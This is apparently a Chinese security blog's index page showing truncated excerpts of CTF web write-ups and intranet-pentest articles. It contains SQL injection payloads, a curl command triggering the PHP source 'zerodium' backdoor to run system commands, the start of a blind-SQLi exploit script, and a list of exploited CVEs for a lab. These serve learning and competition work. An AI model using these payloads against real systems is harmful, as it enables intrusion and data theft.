WHOAMI's Blog

[toc] 前言感觉一晚上考完了高考，刚经历完一模二模三模的你还肝得动吗？ easy_sql经测试登录密码出存在 sql 注入： 1passwd=0')||extractvalue(1,concat(0x7c,(database()),0x7c))#&uname=123 之后用 sqlmap 跑出两个数据表 users、flag，并且过滤了 information，所以用为无列名注入，用 join…using 爆出字段名： 12345passwd=0')||extractvalue(1,concat(0x7c,(select * from (select * from flag join flag as a)b),0x7c))#&uname=123 // idpasswd=0')||extractvalue(1,concat(0x7c,(select * from (select * from flag join flag as a using(id))b),0x7c))#&uname=123 // nopasswd ...

[toc] 前言很好的一个题，偏向于真实的实战环境，但是当时没有做出来真的很可惜，幸好赵总在buuctf上复现了这道题，可以让我这个菜鸡得以复现。 解题进入题目，冬奥会火炬？？？： 题目给了源码，源码就两个，都非常简单： user.php 12345<?phpclass User{ public $count;}?> 就定义了一个简单User类。 add_api.php 12345678910111213141516<?phpinclude "user.php";if($user=unserialize($_COOKIE["data"])){ $count[++$user->count]=1; // 数组$count的第几个属性赋值为1 if($count[]=1){ $user->count+=1; setcookie("data",serialize($user)); }else{ eval($_GET[&qu ...

[toc] 前言由于感觉自己一直对一些 Windows 底层协议和原理了解的不够深入，最近一段时间恶补了一些基础的东西。 从这一篇文章开始，我们的内网渗透测试系列文章将更注重于底层协议和原理的学习，包括Windows 的常见认证体系与基础协议的概念和原理，以及他们存在的相关安全问题。本篇文章将给大家介绍 Windows NTLM 认证的相关内容，包括 NTLM 的概念与相关安全问题的介绍。 文中若有不当之处还请各位大佬多多点评 我的博客：https://whoamianony.top/ 在这之前，我们先了解一下 SSP 和 SSPI 这个概念。 SSPI 和 SSPSSPISSPI（Security Support Provider Interface），即 安全服务提供接口，这是 Windows 定义的一套接口，该接口定义了与安全有关的功能函数，包含但不限于： 身份验证机制 信息完整性 为其他协议提供的会话安全机制 SSPSSP（Security Service Provider），即 安全服务提供，他是 SSPI 的实现者，是对 SSPI 相关功能函数的具体实现。微软自己 ...

[toc] 前言前段时间让炒币弄的没心思学习，现在全赔光了，终于可以安下心了好好学学习了…… 今天复现了前段时间虎符杯中 “Internal System” 这道 Web 题，题目质量外瑞古德，做完之后神清气爽，所以在此一记！主要考了 NodeJS 中的两个知识点： JS 弱类型登录绕过 NodeJS 8 HTTP 拆分实现的 SSRF 攻击 解题进入题目，是一个很炫酷的登录页面： 访问 /source 路由得到源码： 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091929394959697989910010110210310410510610710810911011111211311411511611711811912012112212312412512612712812913013 ...

[toc] 能给我们Web狗整点阳间的嘛？？？ 签到 进入题目是一个博客，在里面测试了一顿后没有发现什么漏洞。这个签到太TMD阴间了，如果不放提示的话这道题铁铁的就是0解了。 PHP作为目前主流的web服务器语言，目前在互联网占有60%以上的市场份额，作为服务器软件对安全的影响极大。3.28日发现一例PHP源码投毒事件，疑似git.php.net服务器被攻破，黑客进行了两次后门代码的提交，具体细节官方还在调查，已经将代码服务器迁移到了更加安全的github。后门代码逻辑是显而易见的，很快被作者发现，并将代码回滚。 下面尝试这个后门的利用方法： 1curl -H "Accept-Encodeing: gzip,deflate" -H "User-Agentt: zerodiumsystem('cat /flag');" -v http://eci-2zecqhthq774p5l0ez1r.cloudeci1.ichunqiu.com/index.php 执行后得到如下： 12345678 ...

happysql进入题目，一个登录框： 使用万能密码测试，在登陆的位置存在sql注入。 输入： 12username: whoami"||0#password: 123456 报错： 输入： 12username: whoami"||1#password: 123456 登录成功： 我们可以根据这里进行POST型的sql盲注。 exp： 12345678910111213141516171819202122232425import requestsimport timeimport stringimport binasciiresult = ''url = "http://eci-2ze6t3je33wd120vx3kg.cloudeci1.ichunqiu.com/login.php"payload = 'username=admin1"/**/||case/**/when/**/(lpad(((select/**/group_concat(a.2)/**/from/**/(select/**/2 ...

[toc] baby_flask题目描述：你今天的幸运数字想不想知道，我来告诉你。 进入题目，是一个输出框。输入你的名字，然后随机返回给你一个幸运数字： 我们猜测 /getname?name= 处应该存在SSTI。 F12查看源代码发现提示过滤了一下字符： 123456blacklist</br> '.','[','\'','"','\\','+',':','_',</br> 'chr','pop','class','base','mro','init','globals','get',</br> 'eval','exec','os',&#x ...

[toc] little_trick进入题目，给出源码： 1234567891011<?php error_reporting(0); highlight_file(__FILE__); $nep = $_GET['nep']; $len = $_GET['len']; if(intval($len)<8 && strlen($nep)<13){ eval(substr($nep,0,$len)); }else{ die('too long!'); }?> 有以下几个限制： GET传入的len的数值不能大于8 GET传入的nep的长度不能超过13 绕过以上两个限制后才可以执行代码 eval(substr($nep,0,$len)); 。 PHP substr() 函数用于返回字符串的一部分，使用方法如下： 1substr(string,start,length) str ...

[toc] 前言假期马上结束了，闲暇之时我自己尝试着搭建了一个内网渗透的靶场。靶场是根据比较新的漏洞进行搭建的，质量自以为还可以。 目前此靶场已在vulnstack开源，下载链接：http://vulnstack.qiyuanxuetang.net/vuln/detail/9/ 文中若有不当之处还请各位大佬多多点评 我的博客：https://whoamianony.top/ 整个靶场的网络环境分为三层。从最初的信息收集、外网初探、攻入内网、搭建代理，横向移动，最终拿下域控。整个靶场所涉及的技术点大致如下： 信息收集： 端口扫描 端口服务识别 漏洞利用： 漏洞搜索与利用 Laravel Debug mode RCE（CVE-2021-3129）漏洞利用 Docker逃逸 通达OA v11.3 漏洞利用 Linux环境变量提权 Redis 未授权访问漏洞 Linux sudo权限提升（CVE-2021-3156）漏洞利用 SSH密钥利用 Windows NetLogon 域内权限提升（CVE-2020-1472）漏洞利用 MS14-068漏洞利用 构建隧道： 路由转发与代 ...

[toc] 前言这次比赛太难了，Web 四分之三都是零解。 [VNCTF 2021]Ez_game进入题目，是一个小游戏： 只有三条命，通过就给flag。查看源码，发现注释里写道，游戏有十关： 发现几个js，进入game.js，里面定义了一些游戏的属性。在PlayerData类中看到了人物的属性： 在InitLevel()方法中发现声明了一个player对象： 跟进Player()类： 该类中依然有人物的那些属性。 我们可以在控制台中修改player对象的属性，直接修改人物属性： 我们尝试修改这些属性： 1234player.health = 1000player.healthMax = 1000player.boomerands = 1000player.bigBoomerands = 1000 好了，现在我们就无敌了，那就玩吧。 玩到第三关的时候，发现死亡后重生时可以进入之前存档的一关。在 js 中找到疑似存档关卡的一个值 localStorage.kbap_warp： 设置 localStorage.kbap_warp 为 10，这样我们死亡后去进入存档，就可以 ...